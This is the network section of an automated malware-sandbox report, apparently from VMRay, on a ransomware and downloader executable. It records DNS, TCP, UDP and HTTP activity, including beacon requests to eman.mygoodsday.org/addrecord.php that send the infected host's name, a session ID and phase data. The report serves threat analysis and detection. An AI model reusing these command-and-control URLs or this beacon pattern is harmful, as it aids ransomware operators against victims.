242713ef...bd95 | Network
Logo
Try VMRay Analyzer
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: Dropper, Riskware, Downloader, Trojan, Ransomware

242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95 (SHA256)

CURRENT_DIRnwovkcyl.exe

Windows Exe (x86-32)

Created at 2018-10-03 03:03:00

...

Notifications (1/1)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

Network Overview

Hosts (4)
»
Hostname IP Address Location Protocols Reputation Status WHOIS Data
eman.mygoodsday.org 104.218.120.192 Amsterdam (Netherlands) HTTP, TCP, UDP
Not Queried
Show WHOIS
lhniwsj 192.168.0.96 - -
Not Queried
Show WHOIS
- 157.56.120.207 - UDP
Not Queried
Not Queried
- 157.56.120.208 - UDP
Not Queried
Not Queried
DNS Queries (2)
»
Hostname Categories Names Source Reputation Status
eman.mygoodsday.org - - Function Log
Not Queried
lhniwsj - - Function Log
Not Queried
URLs (3)
»
URL Categories Names Source HTTP Status Code Reputation Status
http://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START - - Function Log OK (200)
Not Queried
http://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 - - Function Log OK (200)
Not Queried
http://eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB - - Function Log OK (200)
Not Queried

Connections

DNS (5)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = LHnIwsj True 1
Fn
Resolve Name host = eman.mygoodsday.org, address_out = 104.218.120.192, service = 80 True 3
Fn
Resolve Name host = LHnIwsj, address_out = 192.168.0.96 True 1
Fn
TCP Sessions (6)
»
Information Value
Total Data Sent 2.24 KB
Total Data Received 1.71 KB
Contacted Host Count 2
Contacted Hosts 104.218.120.192, 104.218.120.192:80
TCP Session #1
»
Information Value
Handle 0x280
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 104.218.120.192
Remote Port 80
Local Address 0.0.0.0
Local Port 49426
Data Sent 0.22 KB
Data Received 0.17 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 104.218.120.192, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 229, size_out = 229 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 178, size_out = 178 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
»
Information Value
Handle 0x2a8
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 104.218.120.192
Remote Port 80
Local Address 0.0.0.0
Local Port 49505
Data Sent 0.24 KB
Data Received 0.17 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 104.218.120.192, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 245, size_out = 245 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 178, size_out = 178 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
»
Information Value
Handle 0x288
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 104.218.120.192
Remote Port 80
Local Address 0.0.0.0
Local Port 49950
Data Sent 0.24 KB
Data Received 0.17 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 104.218.120.192, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 249, size_out = 249 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 178, size_out = 178 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #4
»
Information Value
Source PCAP
Stream ID 0
Remote Address 104.218.120.192
Remote Port 80
Local Address 192.168.0.96
Local Port 49426
Data Sent 0.50 KB
Data Received 0.40 KB
Time Highest Layer Additional Information Success
16.890172 s TCP Data Sent: 0.06 KB, Data Received: 0.06 KB True
16.912368 s TCP Data Sent: 0.05 KB, Data Received: 0.23 KB True
16.913527 s HTTP Data Sent: 0.28 KB, Data Received: 0.05 KB True
17.076747 s TCP Data Sent: 0.05 KB, Data Received: 0.05 KB True
17.098214 s TCP Data Sent: 0.05 KB, Data Received: 0.00 KB False
TCP Session #5
»
Information Value
Source PCAP
Stream ID 12
Remote Address 104.218.120.192
Remote Port 80
Local Address 192.168.0.96
Local Port 49950
Data Sent 0.52 KB
Data Received 0.40 KB
Time Highest Layer Additional Information Success
134.106965 s TCP Data Sent: 0.06 KB, Data Received: 0.06 KB True
134.125823 s TCP Data Sent: 0.05 KB, Data Received: 0.23 KB True
134.128745 s HTTP Data Sent: 0.30 KB, Data Received: 0.05 KB True
134.281792 s TCP Data Sent: 0.05 KB, Data Received: 0.05 KB True
134.300292 s TCP Data Sent: 0.05 KB, Data Received: 0.00 KB False
TCP Session #6
»
Information Value
Source PCAP
Stream ID 5
Remote Address 104.218.120.192
Remote Port 80
Local Address 192.168.0.96
Local Port 49505
Data Sent 0.51 KB
Data Received 0.40 KB
Time Highest Layer Additional Information Success
29.044740 s TCP Data Sent: 0.06 KB, Data Received: 0.06 KB True
29.068192 s TCP Data Sent: 0.05 KB, Data Received: 0.23 KB True
29.068909 s HTTP Data Sent: 0.29 KB, Data Received: 0.05 KB True
29.243864 s TCP Data Sent: 0.05 KB, Data Received: 0.05 KB True
29.445422 s TCP Data Sent: 0.05 KB, Data Received: 0.00 KB False
UDP Sessions (3)
»
Total Data Sent 2.46 KB
Total Data Received 2.64 KB
Contacted Host Count 3
Contacted Hosts 192.168.0.1, 157.56.120.207, 157.56.120.208
UDP Session #1
»
Information Value
Source PCAP
Stream ID 104
Remote Address 192.168.0.1
Remote Port 53
Local Address 192.168.0.96
Local Port 62901
Data Sent 0.15 KB
Data Received 0.24 KB
Time Highest Layer Additional Information Success
14.083024 s DNS Data Sent: 0.08 KB, Data Received: 0.15 KB True
15.607461 s DNS Data Sent: 0.08 KB, Data Received: 0.09 KB True
UDP Session #2
»
Information Value
Source PCAP
Stream ID 144
Remote Address 157.56.120.207
Remote Port 3544
Local Address 192.168.0.96
Local Port 50249
Data Sent 2.21 KB
Data Received 2.25 KB
Time Highest Layer Additional Information Success
33.391598 s ICMPV6 Data Sent: 0.10 KB, Data Received: 0.15 KB True
41.645215 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
46.331574 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
60.444547 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
69.618466 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
90.035365 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
94.800160 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
123.145267 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
129.509915 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
137.515052 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
139.384332 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
141.290905 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
144.077494 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
148.005067 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
149.992170 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
151.816693 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
158.590501 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
168.033587 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
177.933937 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
193.152436 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
194.815792 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
200.084645 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
202.083030 s IPV6 Data Sent: 0.10 KB, Data Received: 0.10 KB True
UDP Session #3
»
Information Value
Source PCAP
Stream ID 145
Remote Address 157.56.120.208
Remote Port 3544
Local Address 192.168.0.96
Local Port 50249
Data Sent 0.10 KB
Data Received 0.15 KB
Time Highest Layer Additional Information Success
33.454531 s ICMPV6 Data Sent: 0.10 KB, Data Received: 0.15 KB True
HTTP Sessions (3)
»
Information Value
Total Data Sent 0.71 KB
Total Data Received 0.52 KB
Contacted Host Count 1
Contacted Hosts eman.mygoodsday.org
HTTP Session #1
»
Information Value
Source Function Log
User Agent Mozilla/4.0 (compatible; Synapse)
Server Name eman.mygoodsday.org
Server Port 80
Data Sent 0.22 KB
Data Received 0.17 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = eman.mygoodsday.org, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START True 1
Fn
Send HTTP Request headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START True 1
Fn
Data
Read Response size = 178, size_out = 178 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
Source Function Log
User Agent Mozilla/4.0 (compatible; Synapse)
Server Name eman.mygoodsday.org
Server Port 80
Data Sent 0.24 KB
Data Received 0.17 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = eman.mygoodsday.org, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 True 1
Fn
Send HTTP Request headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 True 1
Fn
Data
Read Response size = 178, size_out = 178 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
Source Function Log
User Agent Mozilla/4.0 (compatible; Synapse)
Server Name eman.mygoodsday.org
Server Port 80
Data Sent 0.24 KB
Data Received 0.17 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = eman.mygoodsday.org, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB True 1
Fn
Send HTTP Request headers = connection: keep-alive, host: eman.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = eman.mygoodsday.org/addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=460F9943EA70F103|2891|1GB True 1
Fn
Data
Read Response size = 178, size_out = 178 True 1
Fn
Data
Close Session - True 1
Fn
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image